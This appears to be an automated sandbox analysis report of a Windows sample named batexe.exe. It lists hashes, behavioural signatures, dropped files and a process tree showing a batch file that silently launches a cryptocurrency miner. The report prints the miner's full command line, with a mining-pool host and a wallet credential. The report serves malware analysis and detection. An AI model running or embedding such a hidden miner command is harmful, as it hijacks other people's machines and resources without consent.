Analysis
-
max time kernel
293s -
max time network
298s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
18/02/2024, 01:48
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 216 b2e.exe 2712 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2712 cpuminer-sse2.exe 2712 cpuminer-sse2.exe 2712 cpuminer-sse2.exe 2712 cpuminer-sse2.exe 2712 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/868-7-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 868 wrote to memory of 216 868 batexe.exe 85 PID 868 wrote to memory of 216 868 batexe.exe 85 PID 868 wrote to memory of 216 868 batexe.exe 85 PID 216 wrote to memory of 4300 216 b2e.exe 86 PID 216 wrote to memory of 4300 216 b2e.exe 86 PID 216 wrote to memory of 4300 216 b2e.exe 86 PID 4300 wrote to memory of 2712 4300 cmd.exe 89 PID 4300 wrote to memory of 2712 4300 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Users\Admin\AppData\Local\Temp\6AA1.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6AA1.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6AA1.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6D02.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2712
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11.9MB
MD504d50cbb43d10f6fe96d0598bc8cc6bb
SHA1a0cf4634ad63f62a0207ac0290241565baf29667
SHA256d715c6d19d83e735ba8d0578eef43397c18770b40f46adfb58a8fa0061d6fb61
SHA5121117949820b865112f59bd4d6d13b3b7f936d2d792a875de529015fa1717cc8d8107d0be738ac2c0dbb92b05e3f0052a9ecdb4eb6154c3960ffbcb41ec4810cd
-
Filesize
4.3MB
MD5488b1d388cfc8d7e477b523a4e83c2d4
SHA17f6ead04e74c7b9c27ab4650ef1c8b1714f3fc33
SHA2568d118ab251b9809fcd2d50c93fa40bf1605b74defde3847ba0fd5a3ddfaf4c30
SHA51222341d61480c28baaf98fa14e2a14da4d20e3883a89c39acb799146de844348d4fa5ffef8ae1a82efbbfaeab34d0027f1d9b6ed15d95ab851ae4577b50718ab0
-
Filesize
4.6MB
MD504c61763ad17939a23d8ad7aa71aebfa
SHA1c75b2fe8a5feaf3496830bf1db4f59dbee98c700
SHA2566244da0e26e9f3004a57fca59841b3694762d266616d400f29e82c27041bef97
SHA51265268394a4b2c178104361a72f6da469f36291d0d791f2f98569e0179c59075a2c149763058c2d6a64120fee8eb56a06537f781ec742b10b61f2ec933372ef70
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.1MB
MD5e7321383474adcd1baf061e706338aaf
SHA125f3982e006ad22f106d31de2693da22f9f8cf49
SHA2564e6b508fb7e3bd8c3674abfe282a4caebb6219cf92f9b72e4a8e1e34c14e8447
SHA512f905d3ddc8331e99f96fd94d4f74a3833d32d77919dd5eff59799629d7059aa30c94ddfccd634d3a4b3a7c0737fe9e84826165e6fae4fabea53ff6ab6f7aa816
-
Filesize
1.9MB
MD57a701e450f2c5b17c78643adadf2edd1
SHA1b497b2b01bbaed68fba7eefb313bf5339cfe01ae
SHA2560e3348980689174da9e0bb8d6235effb48ea5c2cc982f7b30cfacd0f29f0985b
SHA51224dd757535289b3fabce786df5e13cd544445b10066f22dbcf6c88d5217c903a595e352459ecc33f5d9c90720cab0ed6e6ec61468ce2e503da06c7316055e883
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.7MB
MD5ee1a8e57086a01ac92e32b613ff2d7c0
SHA157a3de69342eee1fde97ef700a37bf25a196e167
SHA256e37d62b1b39505ecafa8ab48dcb46668e6e4ed5283ec0db8a5ec8df60998c887
SHA5124e29c15c6b59c7d9c99231541d2026e2549483798798545cd73848a27d7553b33ba657a70e203b9ed7f69236b5f702e7a8b03db7aaee5cf2866d4c3546df3d9c
-
Filesize
1.3MB
MD5cbf8c0f535c6d0d23c1e649fe97d7343
SHA12b022fae49adf45b1ea6ca0d95eec6d31be89047
SHA2568cd5b6c8ccda9feda379034cb799845964cc80c9dec3099639f8128e71343819
SHA5124c66acfa541708c4351a4b36cfc8d196d1abba5b9fe73a61d3f2e778dae934fb733a8d49582ced379a5badd61fe77603740fdc7a91993e1746feec17f89aeaf0
-
Filesize
1.9MB
MD5190a0c6fd2d45f9673bf9bd9c389450b
SHA1fd4b08addcf484e25c0f7fa12cb353f9c669a46e
SHA25640ae626357eb52cd35efe7ec10c3bd388a9bed4da19ca488ce82a8b4ceef3283
SHA512baf1bc5c20827735a139534f4337b33d1a97ad0d3975d215b41c5ee3d802963a151ce8ae31f99ab1733a286bd7a0990f0086bf72990c3a6784d2305dbdfe3e1c
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770